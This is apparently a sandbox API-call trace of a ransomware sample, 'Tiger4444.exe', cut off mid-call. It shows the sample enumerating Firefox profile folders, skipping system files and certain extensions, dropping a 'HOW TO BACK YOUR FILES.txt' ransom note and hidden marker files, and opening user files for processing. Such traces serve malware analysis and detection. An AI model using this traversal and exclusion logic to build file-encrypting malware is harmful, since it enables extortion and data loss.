ftLastWriteTime.dwLowDateTime=0x83cc4e42, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0051.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.641] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.641] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.641] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.641] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdbd76e4, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83cc4e42, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.641] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.641] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.641] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.641] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.641] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.641] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83cc4e42, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83cc4e42, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83cc4e42, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.641] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.641] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.641] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4079e226, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WINNT_x86_64-msvc", cAlternateFileName="WINNT_~1")) returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="Tiger4444.exe") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2=".") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="..") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="windows") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="bootmgr") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="pagefile.sys") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="boot") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="ids.txt") returned 1 [0051.641] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="NTUSER.DAT") returned 1 [0051.642] lstrcpyW (in: lpString1=0x30aeb44, lpString2="WINNT_x86_64-msvc" | out: lpString1="WINNT_x86_64-msvc") returned="WINNT_x86_64-msvc" [0051.642] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0051.642] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc0) returned 0xc5f6a8 [0051.642] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc666a8 [0051.642] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4079e226, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WINNT_x86_64-msvc", cAlternateFileName="WINNT_~1")) returned 0 [0051.642] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0051.642] lstrcpyW (in: lpString1=0x30aeb44, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.642] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.643] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.643] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.643] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.644] CloseHandle (hObject=0x260) returned 1 [0051.644] CloseHandle (hObject=0x2ac) returned 1 [0051.644] GetCurrentThreadId () returned 0xfa8 [0051.644] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0051.644] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc" [0051.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5f6a8 | out: hHeap=0xc50000) returned 1 [0051.644] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0051.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc" [0051.644] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\" [0051.644] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3" [0051.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\winnt_x86_64-msvc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.645] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.648] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.649] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.649] CloseHandle (hObject=0x2ac) returned 1 [0051.649] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc") returned 95 [0051.649] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.649] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83cc4e42, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.650] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.650] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.650] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.650] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83cc4e42, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.650] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.650] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.650] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.650] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.650] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.650] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83cc4e42, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83cc4e42, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83ceb0a8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.650] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83cc4e42, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83cc4e42, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83ceb0a8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.650] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.650] lstrcpyW (in: lpString1=0x30aeb68, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.650] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\winnt_x86_64-msvc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.650] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.650] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.651] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.651] CloseHandle (hObject=0x260) returned 1 [0051.651] CloseHandle (hObject=0x2ac) returned 1 [0051.651] GetCurrentThreadId () returned 0xfa8 [0051.651] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0051.651] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting" [0051.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0051.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0051.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting" [0051.651] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\" [0051.651] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3" [0051.651] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.661] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.663] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.664] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.664] CloseHandle (hObject=0x2ac) returned 1 [0051.665] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting") returned 87 [0051.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.665] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb844f993, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83ceb0a8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f88 [0051.665] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.665] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.665] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.665] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.665] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb844f993, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83ceb0a8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.665] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.665] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.665] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.665] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.665] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.665] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83ceb0a8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83ceb0a8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83d114d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.665] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.665] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.665] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x147168f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14717c78, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x14717c78, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="archived", cAlternateFileName="")) returned 1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.665] lstrcmpiW (lpString1="archived", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="Tiger4444.exe") returned -1 [0051.665] lstrcmpiW (lpString1="archived", lpString2=".") returned 1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="..") returned 1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="windows") returned -1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="bootmgr") returned -1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="pagefile.sys") returned -1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="boot") returned -1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="ids.txt") returned -1 [0051.665] lstrcmpiW (lpString1="archived", lpString2="NTUSER.DAT") returned -1 [0051.666] lstrcpyW (in: lpString1=0x30aeb58, lpString2="archived" | out: lpString1="archived") returned="archived" [0051.666] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0051.666] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc2) returned 0xc8d4a0 [0051.666] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66668 [0051.666] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d5bba89, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x2d5bba89, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2d5bba89, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="session-state.json", cAlternateFileName="SESSIO~1.JSO")) returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="Tiger4444.exe") returned -1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2=".") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="..") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="windows") returned -1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="bootmgr") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="pagefile.sys") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="boot") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="ids.txt") returned 1 [0051.666] lstrcmpiW (lpString1="session-state.json", lpString2="NTUSER.DAT") returned 1 [0051.666] lstrcpyW (in: lpString1=0x30aeb58, lpString2="session-state.json" | out: lpString1="session-state.json") returned="session-state.json" [0051.666] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json", dwFileAttributes=0x0) returned 1 [0051.667] lstrlenW (lpString="session-state.json") returned 18 [0051.667] lstrlenW (lpString="Tiger4444") returned 9 [0051.667] lstrcmpiW (lpString1="tate.json", lpString2="Tiger4444") returned -1 [0051.667] lstrlenW (lpString=".dll") returned 4 [0051.667] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.667] lstrlenW (lpString=".lnk") returned 4 [0051.667] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.667] lstrlenW (lpString=".ini") returned 4 [0051.667] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.667] lstrlenW (lpString=".sys") returned 4 [0051.667] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\session-state.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.667] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.667] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14312015904) returned 1 [0051.667] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=161) returned 1 [0051.667] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0051.667] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0051.667] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x2c8 [0051.669] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0xbe0000 [0051.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, 